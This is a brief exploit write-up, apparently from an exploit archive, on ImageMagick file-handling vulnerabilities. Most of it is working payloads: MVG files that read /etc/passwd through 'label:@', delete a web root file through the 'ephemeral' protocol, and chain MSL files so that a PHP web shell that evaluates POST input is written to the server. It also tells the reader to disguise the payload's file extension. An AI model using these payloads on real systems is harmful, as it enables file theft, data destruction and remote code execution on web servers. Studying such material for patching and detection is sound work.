Credit to @CrazedSec for original paper, ID 4698
ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.
Here are some useful trick to complement the fill 'url()' vulnerability
described by @CrazedSec.
@air
== 1 ==
It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context
As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
else.
If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.
== 2 ==
You can use a similar technique to delete a file, provided ImageMagick is built
with support for it's ephemeral protocol:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'ephemeral:/var/www/index.php'
pop graphic-context
== 3 ==
You can move files around, provided you're able to determine the location of
uploaded files. This can be used to upload new files as well as overwrite
existing files.
first_image.png:
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/var/www/uploads/second_image.png"/>
<write filename="/var/www/hi.php"/>
</image>
second_image.png:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
pop graphic-context
third_image.png:
push graphic-context
viewbox 0 0 1024 1024
image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
pop graphic-context